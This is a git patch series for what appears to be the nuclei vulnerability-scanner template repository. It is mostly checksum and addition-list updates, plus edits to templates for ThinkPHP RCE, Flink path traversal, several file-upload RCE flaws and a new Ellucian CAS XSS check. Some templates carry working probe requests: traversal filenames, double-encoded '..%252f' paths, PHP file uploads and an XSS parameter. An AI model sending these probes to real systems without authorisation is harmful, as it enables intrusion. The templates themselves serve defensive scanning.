http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6498,7 +6499,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:57e9fe7c13d3657e2a352ba3fa1d2e9800067c69 +templates-checksum.txt:5f2e83f9bff43d6376824ce471e0af3363035528 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From cdbb5af233e226df9be55b7a75b95d88ed8dbbb9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 5 Jul 2023 05:56:47 +0000 Subject: [PATCH 382/609] Auto Generated New Template Addition List [Wed Jul 5 05:56:47 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 576adfc8b9..40d435cb71 100644 --- a/.new-additions +++ b/.new-additions @@ -11,4 +11,5 @@ http/exposed-panels/efak-login-panel.yaml http/exposed-panels/pritunl-panel.yaml http/exposed-panels/shell-box.yaml http/exposed-panels/untangle-admin-login.yaml +http/exposed-panels/uptime-kuma-panel.yaml http/exposures/configs/collibra-properties.yaml From e47b533364de309a3822c1fa897520ed9a3d3f31 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 5 Jul 2023 05:56:54 +0000 Subject: [PATCH 383/609] Auto Generated Templates Checksum [Wed Jul 5 05:56:54 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 79a85a78d3..da0d252f27 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3249,6 +3249,7 @@ http/exposed-panels/unauth-xproxy-dashboard.yaml:3e496dc98ceffa3432c0692bba007a7 http/exposed-panels/unauthenticated-frp.yaml:059a007581f93d3e376cb6af12b53e164e057cf2 http/exposed-panels/unifi-panel.yaml:949f113d580ab9bb566a3b2ccca3668e6b61a164 http/exposed-panels/untangle-admin-login.yaml:71adc1e01ccf9b8dff23fe8e2eabe434e307b7b8 +http/exposed-panels/uptime-kuma-panel.yaml:68e10ce42466ba1d7a287c7f2530c8601e873924 http/exposed-panels/user-control-panel.yaml:50326a70775914bead2c0239ac53725dc488b2a5 http/exposed-panels/v2924-admin-panel.yaml:c35a6c933045f594b324e269592690b236f47aa0 http/exposed-panels/vault-panel.yaml:03707a6899d5697afa8a742aded5e86fe852d057 @@ -6499,7 +6500,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:5f2e83f9bff43d6376824ce471e0af3363035528 +templates-checksum.txt:8c3af2fe4c843f8e7e875a7287674b21f6de13bb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 4e590e5d3ce69d200a1e085c1877744750f96d7c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 5 Jul 2023 11:44:31 +0530 Subject: [PATCH 384/609] Update CNVD-2022-86535.yaml --- http/cnvd/2022/CNVD-2022-86535.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cnvd/2022/CNVD-2022-86535.yaml b/http/cnvd/2022/CNVD-2022-86535.yaml index 92f5f94b8d..60528a291f 100644 --- a/http/cnvd/2022/CNVD-2022-86535.yaml +++ b/http/cnvd/2022/CNVD-2022-86535.yaml @@ -1,7 +1,7 @@ id: CNVD-2022-86535 info: - name: Thinkphp Multi Languag- File Inc And RCE + name: ThinkPHP Multi Languag - File Inc & Remote Code Execution (RCE) author: arliya,ritikchaddha severity: high description: | From e9b8fd5a997166979f525820d6a56884b0f86a11 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 5 Jul 2023 06:18:00 +0000 Subject: [PATCH 385/609] Auto Generated New Template Addition List [Wed Jul 5 06:18:00 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 40d435cb71..ac6206ce35 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ file/webshell/asp-webshell.yaml file/webshell/jsp-webshell.yaml file/webshell/php-webshell.yaml +http/cnvd/2022/CNVD-2022-86535.yaml http/cves/2018/CVE-2018-6530.yaml http/cves/2023/CVE-2023-28121.yaml http/exposed-panels/arangodb-web-Interface.yaml From 172933be75ae478a44deb276e1a85b5ad116e21f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 5 Jul 2023 06:18:11 +0000 Subject: [PATCH 386/609] Auto Generated Templates Checksum [Wed Jul 5 06:18:11 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index da0d252f27..72eacdd63d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -419,6 +419,7 @@ http/cnvd/2021/CNVD-2021-30167.yaml:0a37c18c7e821a488af40928c89a01a2ad1ee490 http/cnvd/2021/CNVD-2021-49104.yaml:3a25d729d314817f0c9144d7d39a85558b7264dc http/cnvd/2022/CNVD-2022-03672.yaml:694ee5fd18f112ebb2d636c66ce01beaac4286bb http/cnvd/2022/CNVD-2022-42853.yaml:3dae45e305a5f66a69ecc0cb1ccf4d963b29ccb5 +http/cnvd/2022/CNVD-2022-86535.yaml:f53fc86e5a9ae079c739309ba6f2ff6a37c0e775 http/cnvd/2023/CNVD-2023-12632.yaml:ceb1220ec85f8ba6607052d3ab2c9be79bd1a429 http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2 http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:e265b0ef4cad374b888878d8ebe4cd4bfb3a4c2e @@ -6500,7 +6501,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:8c3af2fe4c843f8e7e875a7287674b21f6de13bb +templates-checksum.txt:194122dce87baac7e93f911eaa5fd3d8b303a5f0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 53260b49b94bfd39a95ac46c70d11b205db29946 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 5 Jul 2023 06:19:37 +0000 Subject: [PATCH 387/609] TemplateMan Update [Wed Jul 5 06:19:37 UTC 2023] :robot: --- http/cnvd/2022/CNVD-2022-86535.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cnvd/2022/CNVD-2022-86535.yaml b/http/cnvd/2022/CNVD-2022-86535.yaml index 60528a291f..5abd0dfd25 100644 --- a/http/cnvd/2022/CNVD-2022-86535.yaml +++ b/http/cnvd/2022/CNVD-2022-86535.yaml @@ -11,6 +11,7 @@ info: - https://blog.csdn.net/qq_60614981/article/details/128724640 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535 metadata: + max-request: 3 verified: true tags: cnvd,cnvd2022,thinkphp,rce From 2a2c309d6cc4520dc811771a46f5bb2f26ad29f8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 5 Jul 2023 12:21:44 +0530 Subject: [PATCH 388/609] Create CVE-2023-2822.yaml --- http/cves/2023/CVE-2023-2822.yaml | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2023/CVE-2023-2822.yaml diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml new file mode 100644 index 0000000000..a779cfb958 --- /dev/null +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-2822 + +info: + name: Ellucian Ethos Identity CAS - Cross-Site Scripting + author: Guax1 + severity: medium + description: | + A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely. + remediation: Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component. + reference: + - https://medium.com/@cyberninja717/685bb1675dfb + - https://medium.com/@cyberninja717/reflected-cross-site-scripting-vulnerability-in-ellucian-ethos-identity-cas-logout-page-685bb1675dfb + - https://vuldb.com/?ctiid.229596 + - https://vuldb.com/?id.229596 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-2822 + cwe-id: CWE-79 + metadata: + max-request: 1 + shodan-query: html:"Ellucian Company" + google-query: "login with ellucian ethos identity" + tags: cve,cve2023,cas,xss,ellucian + +http: + - method: GET + path: + - '{{BaseURL}}/cas/logout?url=https://oast.pro">' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Identity Server' + condition: and + + - type: status + status: + - 200 From ba7ec9a05f4561045a82a337099149c7a3ab736b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 5 Jul 2023 13:20:14 +0530 Subject: [PATCH 389/609] updates --- http/cves/2017/CVE-2017-6090.yaml | 6 +++--- http/cves/2020/CVE-2020-17518.yaml | 9 ++++----- http/cves/2020/CVE-2020-24186.yaml | 9 ++++----- http/cves/2020/CVE-2020-25213.yaml | 6 ++---- http/cves/2020/CVE-2020-28871.yaml | 2 +- http/cves/2020/CVE-2020-35489.yaml | 2 +- http/cves/2021/CVE-2021-1499.yaml | 18 ++++++++---------- http/cves/2021/CVE-2021-21978.yaml | 8 ++++---- http/cves/2021/CVE-2021-3378.yaml | 15 +++++++-------- http/cves/2021/CVE-2021-43421.yaml | 2 +- http/exposed-panels/roxy-fileman.yaml | 2 +- 11 files changed, 36 insertions(+), 43 deletions(-) diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 6053dc8635..f3bda72656 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -21,7 +21,7 @@ info: http: - raw: - - | # REQUEST 1 + - | POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 @@ -34,8 +34,8 @@ http: -----------------------------154934846911423734231554128137-- - - | # REQUEST 2 - GET /logos_clients/1.php HTTP/1.1 + - | + GET /logos_clients/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index 92ed6e04a7..caa25b89c8 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -35,16 +35,15 @@ http: ------WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc" - test-poc + {{randstr}} ------WebKitFormBoundaryoZ8meKnrrso89R6Y-- - - method: GET - path: - - '{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc' + - | + GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1 matchers: - type: dsl dsl: - - 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this. + - 'contains(body_2, "{{randstr}}") && status_code == 200' # Using CVE-2020-17519 to confirm this. # Enhanced by mp on 2022/07/13 diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 939a08869b..07121cc74d 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -77,10 +77,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - 'success":true' @@ -90,4 +86,7 @@ http: condition: and part: body -# Enhanced by mp on 2022/04/19 + - type: status + status: + - 200 +# Enhanced by mp on 2022/04/19 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index 78de49f682..cb9e86ae2b 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -64,12 +64,10 @@ http: condition: and - type: word + part: header words: - application/json - part: header - type: status status: - - 200 - -# Enhanced by mp on 2022/03/27 + - 200 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index 212620f47f..967a510c8b 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -19,7 +19,7 @@ info: epss-score: 0.96822 metadata: max-request: 2 - tags: unauth,cve,fileupload,monitorr,edb,intrusive,packetstorm,cve2020,rce + tags: unauth,cve,fileupload,monitor,edb,intrusive,packetstorm,cve2020,rce http: - raw: diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 31b40151ce..0b9108f4a9 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-434 cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:*:*:* epss-score: 0.90859 - tags: cve,cve2020,wordpress,wp-plugin,rce,fileupload,intrusive + tags: cve,cve2020,wordpress,wp-plugin,rce metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index 2388094d58..426341bd5f 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -41,15 +41,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - - type: word - words: - - "application/json" - part: header - - type: word words: - '{"result":' @@ -57,4 +48,11 @@ http: - '/tmp/passwd9' condition: and -# Enhanced by md on 2022/10/20 + - type: word + words: + - "application/json" + part: header + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 04abe8ea04..dd933ad416 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -44,15 +44,15 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - "File uploaded successfully." + part: body - type: dsl dsl: - "len(body) == 28" # length of "\nFile uploaded successfully." -# Enhanced by mp on 2022/05/05 + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml index 45b5c500bf..b018b85014 100644 --- a/http/cves/2021/CVE-2021-3378.yaml +++ b/http/cves/2021/CVE-2021-3378.yaml @@ -37,7 +37,7 @@ http: Content-Disposition: form-data; name="file"; filename="poc.txt" Content-Type: image/png - POC_TEST + {{randstr}} ------WebKitFormBoundarySHHbUsfCoxlX1bpS @@ -47,19 +47,18 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body_2 words: - - "POC_TEST" - part: body + - "{{randstr}}" - type: word + part: header words: - "text/plain" - "ASP.NET" condition: and - part: header -# Enhanced by mp on 2022/05/18 + - type: status + status: + - 200 diff --git 